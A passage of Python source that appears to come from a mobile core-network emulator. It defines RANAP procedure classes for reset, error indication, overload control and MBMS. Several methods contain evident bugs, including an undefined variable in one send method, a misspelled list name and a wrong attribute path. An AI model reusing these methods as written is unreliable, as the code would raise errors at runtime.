lambda x: bytes_to_uint(x, 8),\n 'SAI' : lambda x: (plmn_buf_to_str(x['pLMNidentity']),\n bytes_to_uint(x['lAC'], 16),\n bytes_to_uint(x['sAC'], 16))},\n {}),\n 'suc': None,\n 'uns': None\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n def recv(self, pdu):\n self._recv(pdu)\n if not self.errcause:\n # verification against HNBd parameters and HNBAP / RUA infos:\n err = False\n if 'LAI' in self.UEInfo:\n if self.UEInfo['LAI'] != (self.RNC.Config['PLMNidentity'], \n self.RNC.Config['LAC']):\n self._log('WNG', 'invalid LAI, %s.%.4x' % self.UEInfo['LAC'])\n err = True\n else:\n # update UE location\n self.UE.set_lai(*self.UEInfo['LAI'])\n if 'RAC' in self.UEInfo:\n if self.UEInfo['RAC'] != self.RNC.Config['RAC']:\n self._log('WNG', 'invalid RAC, %.2x' % self.UEInfo['RAC'])\n err = True\n else:\n # update UE RAC\n self.UE.set_rac(self.UEInfo['RAC'])\n if 'SAI' in self.UEInfo and \\\n self.UEInfo['SAI'][2] != self.RNC.Config['SAC']:\n self._log('WNG', 'invalid SAC, %.2x' % self.UEInfo['SAI'][2])\n err = True\n if err:\n # this means the RNC changed its loc config without prior informing the CN\n # error cause: protocol, message-not-compatible-with-receiver-state\n self.errcause = ('Protocol', 99)\n #\n if not self.errcause:\n # process the NAS PDU, and get a list (potentially empty) of new\n # RANAP procedures to be triggered\n self._ret = self.Iu.process_nas(self.UEInfo['NAS_PDU'])\n \n def trigger(self):\n return self._ret\n\n\nclass RANAPOverloadControlCN(RANAPConlessSigProc):\n \"\"\"Overload Control: TS 25.413, section 8.25\n \n CN-initiated\n request only\n connection-less signalling procedure\n \n InitiatingMessage:\n IEs:\n - 18: NumberOfSteps (O)\n - 86: GlobalRNC_ID (O)\n Extensions:\n - 3: CN_DomainIndicator (O)\n - 96: GlobalCN_ID (O)\n - 171: ExtendedRNC_ID (O)\n - 245: Priority_Class_Indicator (O)\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.overloadControl\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n # not implemented\n\n\nclass RANAPOverloadControlRNC(RANAPConlessSigProc):\n \"\"\"Overload Control: TS 25.413, section 8.25\n \n RNC-initiated\n request only\n connection-less signalling procedure\n \n InitiatingMessage:\n IEs:\n - 18: NumberOfSteps (O)\n - 86: GlobalRNC_ID (O)\n Extensions:\n - 3: CN_DomainIndicator (O)\n - 96: GlobalCN_ID (O)\n - 171: ExtendedRNC_ID (O)\n - 245: Priority_Class_Indicator (O)\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.overloadControl\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n # not implemented\n\n\nclass RANAPResetCN(RANAPConlessSigProc):\n \"\"\"Reset: TS 25.413, section 8.26\n \n CN-initiated\n request only\n connection-less signalling procedure\n \n InitiatingMessage:\n IEs:\n - 3: CN_DomainIndicator (M)\n - 4: Cause (M)\n - 86: GlobalRNC_ID (O)\n Extensions:\n - 96: GlobalCN_ID (O)\n - 171: ExtendedRNC_ID (O)\n SuccessfulOutcome:\n IEs:\n - 3: CN_DomainIndicator (M)\n - 9: CriticalityDiagnostics (O)\n - 86: GlobalRNC_ID (O)\n Extensions:\n - 96: GlobalCN_ID (O)\n - 171: ExtendedRNC_ID (O)\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.reset\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': ({}, {}),\n 'uns': None\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': ({}, {}),\n 'uns': None\n }\n \n send = RANAPConlessSigProc._send\n \n def recv(self, pdu):\n self._recv(pdu)\n try:\n del self.RNC.ProcRanap[self.Code]\n except Exception:\n pass\n if not self.errcause:\n self._log('INF', 'success')\n\n\nclass RANAPResetRNC(RANAPConlessSigProc):\n \"\"\"Reset: TS 25.413, section 8.26\n \n RNC-initiated\n request only\n connection-less signalling procedure\n \n InitiatingMessage:\n IEs:\n - 3: CN_DomainIndicator (M)\n - 4: Cause (M)\n - 86: GlobalRNC_ID (O)\n Extensions:\n - 96: GlobalCN_ID (O)\n - 171: ExtendedRNC_ID (O)\n SuccessfulOutcome:\n IEs:\n - 3: CN_DomainIndicator (M)\n - 9: CriticalityDiagnostics (O)\n - 86: GlobalRNC_ID (O)\n Extensions:\n - 96: GlobalCN_ID (O)\n - 171: ExtendedRNC_ID (O)\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.reset\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': ({}, {}),\n 'uns': None\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': ({}, {}),\n 'uns': None\n }\n \n def recv(self, pdu):\n # recv the reset indication\n self._recv(pdu)\n if not self.errcause:\n self._log('INF', 'cause %r' % (self.RNCInfo['Cause'], ))\n # reset all UE connections handled by the RNC handler in the core network \n # domain indicated\n if self.RNCInfo['CN_DomainIndicator'] == 'ps-domain':\n for ue in self.RNC.UE_IuPS.values():\n ue.IuPS.unset_ran()\n ue.IuPS.unset_ctx()\n self.RNC.UE_IuPS.clear()\n else:\n for ue in self.UE_IuCS.values():\n ue.IuCS.unset_ran()\n ue.IuCS.unset_ctx()\n self.UE_IuCS.clear()\n \n def send(self):\n # copy requested IEs in response\n IEs['CN_DomainIndicator'] = self.RNCInfo['CN_DomainIndicator']\n if 'GlobalRNC_ID' in self.RNCInfo:\n IEs['GlobalRNC_ID'] = self.RNCInfo['GlobalRNC_ID']\n if 'GlobalCN_ID' in self.RNCInfo:\n IEs['GlobalCN_ID'] = self.RNCInfo['GlobalCN_ID']\n if 'ExtendedRNC_ID' in self.RNCInfo:\n IEs['ExtendedRNC_ID'] = self.RNCInfo['ExtendedRNC_ID']\n self.encode_pdu('suc', **IEs)\n return self._send()\n\n\nclass RANAPErrorIndConlessCN(RANAPConlessSigProc):\n \"\"\"Error Indication: TS 25.413, section 8.27\n \n CN-initiated\n request only\n connection-less signalling procedure\n \n InitiatingMessage:\n IEs:\n - 3: CN_DomainIndicator (O)\n - 4: Cause (O)\n - 9: CriticalityDiagnostics (O)\n - 86: GlobalRNC_ID (O)\n Extensions:\n - 96: GlobalCN_ID (O)\n - 171: ExtendedRNC_ID (O)\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.errorIndication\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n errcause = None\n \n def recv(self, pdu):\n if self.TRACK_PDU:\n self._pdu.append( (time(), 'UL', pdu) )\n \n send = RANAPConlessSigProc._send\n\n\nclass RANAPErrorIndConlessRNC(RANAPConlessSigProc):\n \"\"\"Error Indication: TS 25.413, section 8.27\n \n RNC-initiated\n request only\n connection-less signalling procedure\n \n InitiatingMessage:\n IEs:\n - 3: CN_DomainIndicator (O)\n - 4: Cause (O)\n - 9: CriticalityDiagnostics (O)\n - 86: GlobalRNC_ID (O)\n Extensions:\n - 96: GlobalCN_ID (O)\n - 171: ExtendedRNC_ID (O)\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.errorIndication\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n def recv(self, pdu):\n self._recv(pdu)\n if not self.errcause:\n self._log('WNG', 'error ind received: %s.%i' % (self.RNCInfo['Cause'], ))\n # if it corresponds to a previously CN-initiated class 1 procedure\n # abort it\n try:\n self.RNC.ProcRanap[self.RNC.ProcRanapLast].abort()\n except Exception:\n pass\n\n\nclass RANAPErrorIndCN(RANAPSigProc):\n \"\"\"Error Indication: TS 25.413, section 8.27\n \n CN-initiated\n request only\n connection-oriented signalling procedure\n \n InitiatingMessage:\n IEs:\n - 3: CN_DomainIndicator (O)\n - 4: Cause (O)\n - 9: CriticalityDiagnostics (O)\n - 86: GlobalRNC_ID (O)\n Extensions:\n - 96: GlobalCN_ID (O)\n - 171: ExtendedRNC_ID (O)\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.errorIndication\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n errcause = None\n \n def recv(self, pdu):\n if self.TRACK_PDU:\n self._pdu.append( (time(), 'UL', pdu) )\n \n send = RANAPSigProc._send\n\n\nclass RANAPErrorIndRNC(RANAPSigProc):\n \"\"\"Error Indication: TS 25.413, section 8.27\n \n RNC-initiated\n request only\n connection-oriented signalling procedure\n \n InitiatingMessage:\n IEs:\n - 3: CN_DomainIndicator (O)\n - 4: Cause (O)\n - 9: CriticalityDiagnostics (O)\n - 86: GlobalRNC_ID (O)\n Extensions:\n - 96: GlobalCN_ID (O)\n - 171: ExtendedRNC_ID (O)\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.errorIndication\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n def recv(self, pdu):\n self._recv(pdu)\n if not self.errcause is None and 'Cause' in self.UEInfo:\n self._log('WNG', 'error ind received: %s.%i' % self.UEInfo['Cause'])\n # if it corresponds to a previously CN-initiated class 1 procedure\n # abort it\n try:\n self.Iu.Proc[self.Iu.ProcLast].abort()\n except Exception:\n pass\n\n\nclass RANAPCNDeactivateTrace(RANAPSigProc):\n \"\"\"CN Deactivate Trace: TS 25.413, section 8.28\n \n CN-initiated\n request only\n connection-oriented signalling procedure\n \n InitiatingMessage:\n IEs:\n - 65: TraceReference (M)\n - 68: TriggerID (O)\n Extensions:\n None\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.cN_DeactivateTrace\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n def send(self):\n try:\n tracerefl = '0x%s' % hexlify(self.TraceReference)\n except Exception:\n tracerefl = repr(self.TraceReference)\n self._log('INF', 'sent with trace reference %s' % tracerefl)\n return self._send()\n\n\nclass RANAPResetResourceCN(RANAPConlessSigProc):\n \"\"\"Reset Resource: TS 25.413, section 8.29\n \n CN-initiated\n request-response\n connection-less signalling procedure\n \n InitiatingMessage:\n IEs:\n - 3: CN_DomainIndicator (M)\n - 4: Cause (M)\n - 77: ResetResourceList (M)\n - 86: GlobalRNC_ID (O)\n Extensions:\n - 96: GlobalCN_ID (O)\n - 171: ExtendedRNC_ID (O)\n SuccessfulOutcome:\n IEs:\n - 3: CN_DomainIndicator (M)\n - 9: CriticalityDiagnostics (O)\n - 77: ResetResourceAckList (M)\n - 86: GlobalRNC_ID (O)\n Extensions:\n - 96: GlobalCN_ID (O)\n - 171: ExtendedRNC_ID (O)\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.resetResource\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': ({}, {}),\n 'uns': None\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': ({}, {}),\n 'uns': None\n }\n \n send = RANAPConlessSigProc._send\n \n def recv(self, pdu):\n self._recv(pdu)\n try:\n del self.RNC.ProcRanap[self.Code]\n except Exception:\n pass\n if not self.errcause:\n self._log('INF', 'success')\n\n\nclass RANAPResetResourceRNC(RANAPConlessSigProc):\n \"\"\"Reset Resource: TS 25.413, section 8.29\n \n RNC-initiated\n request-response\n connection-less signalling procedure\n \n InitiatingMessage:\n IEs:\n - 3: CN_DomainIndicator (M)\n - 4: Cause (M)\n - 77: ResetResourceList (M)\n - 86: GlobalRNC_ID (O)\n Extensions:\n - 96: GlobalCN_ID (O)\n - 171: ExtendedRNC_ID (O)\n SuccessfulOutcome:\n IEs:\n - 3: CN_DomainIndicator (M)\n - 9: CriticalityDiagnostics (O)\n - 77: ResetResourceAckList (M)\n - 86: GlobalRNC_ID (O)\n Extensions:\n - 96: GlobalCN_ID (O)\n - 171: ExtendedRNC_ID (O)\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.resetResource\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': ({}, {}),\n 'uns': None\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': ({}, {}),\n 'uns': None\n }\n \n def recv(self, pdu):\n self._recv(pdu)\n if not self.errcause:\n self._log('INF', 'cause %r' % (self.RNCInfo['Cause'], ))\n RResList, RResIds = self.RNCInfo['ResetResourceList'], []\n try:\n # we expect a single prot container (TODO: to be confirmed)\n assert(len(RResList) == 1)\n RResList = RReslist[0]\n for RRes in RResList:\n RResIds.append(RRes['value'][1]['iuSigConId'][0])\n except Exception:\n self._log('WNG', 'unexpected formatting of ResetResourceList')\n #\n # reset all UE connections handled by the RNC handler self.RNC in the\n # core network domain indicated\n if self.RNCInfo['CN_DomainIndicator'] == 'ps-domain':\n for rres in RResIds:\n try:\n ue = self.RNC.UE_IuPS[rres]\n except Exception:\n pass\n else:\n ue.IuPS.SM.pdp_suspend()\n if ue.IuPS.GMM.state != 'INACTIVE':\n ue.IuPS.GMM.state = 'IDLE'\n ue.IuPS.unset_ran()\n ue.IuPS.unset_ctx()\n del self.RNC.UE_IuPS[rres]\n else:\n for rres in RResIds:\n try:\n ue = self.RNC.UE_IuCS[rres]\n except Exception:\n pass\n else:\n if ue.IuCS.MM.state != 'INACTIVE':\n ue.IuCS.MM.state = 'IDLE'\n ue.IuCS.unset_ran()\n ue.IuCS.unset_ctx()\n del self.RNC.UE_IuCS[rres]\n self.RResIds = RResIds\n \n def send(self):\n if self.errcause:\n # no unsuccesful outcome possible, send an error ind\n Proc = self.RNC.init_ranap_proc(RANAPErrorIndConlessCN, Cause=self.errcause)\n if Proc:\n return Proc.send()\n else:\n return []\n else:\n # prepare response IEs\n IEs = {'CN_DomainIndicator': self.RNCInfo['CN_DomainIndicator']}\n if 'GlobalRNC_ID' in self.RNCInfo:\n IEs['GlobalRNC_ID'] = self.RNCInfo['GlobalRNC_ID']\n if 'GlobalCN_ID' in self.RNCInfo:\n IEs['GlobalCN_ID'] = self.RNCInfo['GlobalCN_ID']\n if 'ExtendedRNC_ID' in self.RNCInfo:\n IEs['ExtendedRNC_ID'] = self.RNCInfo['ExtendedRNC_ID']\n RResAck = []\n IEs['ResetResourceAckList'] = [RResAck]\n for rres in self.RResIds:\n RResAck.append({'id': 78, 'criticality': 'reject',\n 'value': ('ResetResourceItem', {'iuSigConId': (rres, 24)})})\n self.encode_pdu('suc', **IEs)\n return self._send()\n\n\nclass RANAPRABModificationRequest(RANAPSigProc):\n \"\"\"RAB Modification Request: TS 25.413, section 8.30\n \n RNC-initiated\n request only\n connection-oriented signalling procedure\n \n InitiatingMessage:\n IEs:\n - 91: RAB_ModifyList (M)\n Extensions:\n None\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.rAB_ModifyRequest\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n # not implemented\n\n\nclass RANAPLocationRelatedData(RANAPSigProc):\n \"\"\"Location Related Data: TS 25.413, section 8.31\n \n CN-initiated\n request-accept, request-reject\n connection-oriented signalling procedure\n \n InitiatingMessage:\n IEs:\n - 95: LocationRelatedDataRequestType (O)\n Extensions:\n - 115: LocationRelatedDataRequestTypeSpecificToGERANIuMode (O)\n - 185: RequestedGANSSAssistanceData (C)\n SuccessfulOutcome:\n IEs:\n - 94: BroadcastAssistanceDataDecipheringKeys (O)\n Extensions:\n - 9: CriticalityDiagnostics (O)\n - 186: BroadcastAssistanceDataDecipheringKeys (O)\n UnsuccessfulOutcome:\n IEs:\n - 4: Cause (M)\n Extensions:\n - 9: CriticalityDiagnostics (O)\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.locationRelatedData\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': ({}, {}),\n 'uns': ({}, {})\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': ({}, {}),\n 'uns': ({}, {})\n }\n \n send = RANAPSigProc._send\n \n def recv(self, pdu):\n self._recv(pdu)\n try:\n del self.Iu.Proc[self.Code]\n except Exception:\n pass\n #\n if self.errcause:\n self.success = False\n elif pdu[0] == 'unsuccessfulOutcome':\n self.success = False\n try:\n self._log('WNG', 'failure, rejected with cause %r' % (self.UEInfo['Cause'], ))\n except Exception:\n self._log('WNG', 'failure, rejected without cause')\n else:\n self.success = True\n self._log('INF', 'success')\n # TODO: do something with the returned info\n\n\nclass RANAPInformationTransfer(RANAPConlessSigProc):\n \"\"\"Information Transfer: TS 25.413, section 8.32\n \n CN-initiated\n request-accept, request-reject\n connection-less signalling procedure\n \n InitiatingMessage:\n IEs:\n - 3: CN_DomainIndicator (M)\n - 96: GlobalCN_ID (O)\n - 104: InformationTransferID (M)\n - 106: ProvidedData (M)\n Extensions:\n None\n SuccessfulOutcome:\n IEs:\n - 3: CN_DomainIndicator (M)\n - 9: CriticalityDiagnostics (O)\n - 86: GlobalRNC_ID (M)\n - 104: InformationTransferID (M)\n Extensions:\n - 171: ExtendedRNC_ID (O)\n UnsuccessfulOutcome:\n IEs:\n - 3: CN_DomainIndicator (M)\n - 4: Cause (M)\n - 9: CriticalityDiagnostics (O)\n - 86: GlobalRNC_ID (M)\n - 104: InformationTransferID (M)\n Extensions:\n - 171: ExtendedRNC_ID (O)\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.informationTransfer\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': ({}, {}),\n 'uns': ({}, {})\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': ({}, {}),\n 'uns': ({}, {})\n }\n \n # not implemented\n\n\nclass RANAPUESpecificInformation(RANAPSigProc):\n \"\"\"UE Specific Information: TS 25.413, section 8.33\n \n CN-initiated\n request only\n connection-oriented signalling procedure\n \n InitiatingMessage:\n IEs:\n - 118: UESBI_Iu (O)\n Extensions:\n None\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.uESpecificInformation\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n # not implemented\n\n\nclass RANAPDirectInformationTransferCN(RANAPConlessSigProc):\n \"\"\"Direct Information Transfer: TS 25.413, section 8.34\n \n CN-initiated\n request only\n connection-less signalling procedure\n \n InitiatingMessage:\n IEs:\n - 3: CN_DomainIndicator (M)\n - 86: GlobalRNC_ID (O)\n - 96: GlobalCN_ID (O)\n - 126: InterSystemInformationTransferType (O)\n Extensions:\n - 171: ExtendedRNC_ID (O)\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.directInformationTransfer\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n # not implemented\n\n\nclass RANAPDirectInformationTransferRNC(RANAPConlessSigProc):\n \"\"\"Direct Information Transfer: TS 25.413, section 8.34\n \n RNC-initiated\n request only\n connection-less signalling procedure\n \n InitiatingMessage:\n IEs:\n - 3: CN_DomainIndicator (M)\n - 86: GlobalRNC_ID (O)\n - 96: GlobalCN_ID (O)\n - 126: InterSystemInformationTransferType (O)\n Extensions:\n - 171: ExtendedRNC_ID (O)\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.directInformationTransfer\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n # not implemented\n\n\nclass RANAPUplinkInformationTransfer(RANAPConlessSigProc):\n \"\"\"Uplink Information Transfer: TS 25.413, section 8.35\n \n RNC-initiated\n request-accept, request-reject\n connection-less signalling procedure\n \n InitiatingMessage:\n IEs:\n - 3: CN_DomainIndicator (M)\n - 86: GlobalRNC_ID (M)\n - 123: InformationTransferType (C)\n - 136: InformationExchangeID (M)\n - 137: InformationExchangeType (M)\n - 139: InformationRequestType (C)\n Extensions:\n - 171: ExtendedRNC_ID (O)\n SuccessfulOutcome:\n IEs:\n - 3: CN_DomainIndicator (M)\n - 9: CriticalityDiagnostics (O)\n - 96: GlobalCN_ID (O)\n - 136: InformationExchangeID (M)\n - 138: InformationRequested (O)\n Extensions:\n None\n UnsuccessfulOutcome:\n IEs:\n - 3: CN_DomainIndicator (M)\n - 4: Cause (M)\n - 9: CriticalityDiagnostics (O)\n - 96: GlobalCN_ID (O)\n - 136: InformationExchangeID (M)\n Extensions:\n None\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.uplinkInformationExchange\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': ({}, {}),\n 'uns': ({}, {})\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': ({}, {}),\n 'uns': ({}, {})\n }\n \n # not implemented\n\n\nclass RANAPMBSMSessionStart(RANAPSigProc):\n \"\"\"MBMS Session Start: TS 25.413, section 8.36\n \n CN-initiated\n request-accept, request-reject\n connection-oriented signalling procedure\n \n InitiatingMessage:\n IEs:\n - 79: IuSignallingConnectionIdentifier (M)\n - 96: GlobalCN_ID (O)\n - 135: FrequenceLayerConvergenceFlag (O)\n - 143: MBMSBearerServiceType (M)\n - 145: MBMSServiceArea (M)\n - 146: MBMSSessionDuration (M)\n - 147: MBMSSessionIdentity (O)\n - 148: PDP_TypeInformation (O)\n - 149: RAB_Parameters (M)\n - 150: RAListofIdleModeUEs (O)\n - 153: TMGI (M)\n - 157: MBMSSessionRepetitionNumber (O)\n - 163: TimeToMBMSDataTransfer (M)\n Extensions:\n - 169: MBMSCountingInformation (O)\n - 201: MBMSSynchronisationInformation (O)\n - 238: PDP_TypeInformation_extension (O)\n - 276: Session_Re_establishment_Indicator (O)\n SuccessfulOutcome:\n IEs:\n - 4: Cause (O)\n - 9: CriticalityDiagnostics (O)\n - 154: TransportLayerInformation (O)\n Extensions:\n None\n UnsuccessfulOutcome:\n IEs:\n - 4: Cause (M)\n - 9: CriticalityDiagnostics (O)\n Extensions:\n None\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.mBMSSessionStart\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': ({}, {}),\n 'uns': ({}, {})\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': ({}, {}),\n 'uns': ({}, {})\n }\n \n # not implemented\n\n\nclass RANAPMBMSSessionUpdate(RANAPSigProc):\n \"\"\"MBMS Session Update: TS 25.413, section 8.37\n \n CN-initiated\n request-accept, request-reject\n connection-oriented signalling procedure\n \n InitiatingMessage:\n IEs:\n - 134: DeltaRAListofIdleModeUEs (M)\n - 152: SessionUpdateID (M)\n Extensions:\n None\n SuccessfulOutcome:\n IEs:\n - 4: Cause (O)\n - 9: CriticalityDiagnostics (O)\n - 152: SessionUpdateID (M)\n - 154: TransportLayerInformation (O)\n Extensions:\n None\n UnsuccessfulOutcome:\n IEs:\n - 4: Cause (M)\n - 9: CriticalityDiagnostics (O)\n - 152: SessionUpdateID (M)\n Extensions:\n None\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.mBMSSessionUpdate\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': ({}, {}),\n 'uns': ({}, {})\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': ({}, {}),\n 'uns': ({}, {})\n }\n \n # not implemented\n\n\nclass RANAPMBMSSessionStop(RANAPSigProc):\n \"\"\"MBMS Session Stop: TS 25.413, section 8.38\n \n CN-initiated\n request-response\n connection-oriented signalling procedure\n \n InitiatingMessage:\n IEs:\n - 144: MBMSCNDe_Registration (M)\n Extensions:\n None\n SuccessfulOutcome:\n IEs:\n - 4: Cause (O)\n - 9: CriticalityDiagnostics (O)\n Extensions:\n None\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.mBMSSessionStop\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': ({}, {}),\n 'uns': None\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': ({}, {}),\n 'uns': None\n }\n \n # not implemented\n\n\nclass RANAPMBMSUELinking(RANAPSigProc):\n \"\"\"MBMS UE Linking: TS 25.413, section 8.39\n \n CN-initiated\n request-response\n connection-oriented signalling procedure\n \n InitiatingMessage:\n IEs:\n - 141: JoinedMBMSBearerService_IEs (O)\n - 142: LeftMBMSBearerService_IEs (O)\n Extensions:\n None\n Outcome:\n IEs:\n - 9: CriticalityDiagnostics (O)\n - 155: UnsuccessfulLinking_IEs (O)\n Extensions:\n None\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.mBMSUELinking\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': ({}, {}),\n 'uns': None\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': ({}, {}),\n 'uns': None\n }\n \n # not implemented\n\n\nclass RANAPMBMSRegistration(RANAPSigProc):\n \"\"\"MBMS Registration: TS 25.413, section 8.40\n \n RNC-initiated\n request-accept, request-reject\n connection-oriented signalling procedure\n \n InitiatingMessage:\n IEs:\n - 86: GlobalRNC_ID (O)\n - 132: APN (C)\n - 140: IPMulticastAddress (C)\n - 151: MBMSRegistrationRequestType (M)\n - 153: TMGI (M)\n Extensions:\n - 171: ExtendedRNC_ID (O)\n SuccessfulOutcome:\n IEs:\n - 9: CriticalityDiagnostics (O)\n - 96: GlobalCN_ID (O)\n - 153: TMGI (O)\n Extensions:\n None\n UnsuccessfulOutcome:\n IEs:\n - 4: Cause (M)\n - 9: CriticalityDiagnostics (O)\n - 96: GlobalCN_ID (O)\n - 153: TMGI (O)\n Extensions:\n None\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.mBMSRegistration\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': ({}, {}),\n 'uns': ({}, {})\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': ({}, {}),\n 'uns': ({}, {})\n }\n \n # not implemented\n\n\nclass RANAPMBMSCNDeregistration(RANAPSigProc):\n \"\"\"MBMS CN Deregistration: TS 25.413, section 8.41\n \n CN-initiated\n request-response\n connection-less signalling procedure\n \n InitiatingMessage:\n IEs:\n - 96: GlobalCN_ID (O)\n - 153: TMGI (M)\n Extensions:\n None\n SuccessfulOutcome:\n IEs:\n - 4: Cause (O)\n - 9: CriticalityDiagnostics (O)\n - 86: GlobalRNC_ID (M)\n - 153: TMGI (M)\n Extensions:\n - 171: ExtendedRNC_ID (O)\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.mBMSCNDe_Registration\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': ({}, {}),\n 'uns': None\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': ({}, {}),\n 'uns': None\n }\n \n # not implemented\n\n\nclass RANAPMBMSRABEstablishmentInd(RANAPSigProc):\n \"\"\"MBMS RAB Establishement Indication: TS 25.413, section 8.42\n \n RNC-initiated\n request only\n connection-oriented signalling procedure\n \n InitiatingMessage:\n IEs:\n - 154: TransportLayerInformation (M)\n Extensions:\n None\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.mBMSRABEstablishmentIndication\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n # not implemented\n\n\nclass RANAPMBMSRABRelease(RANAPSigProc):\n \"\"\"MBMS RAB Release: TS 25.413, section 8.43\n \n RNC-initiated\n request-accept, request-reject\n connection-oriented signalling procedure\n \n InitiatingMessage:\n IEs:\n - 4: Cause (M)\n 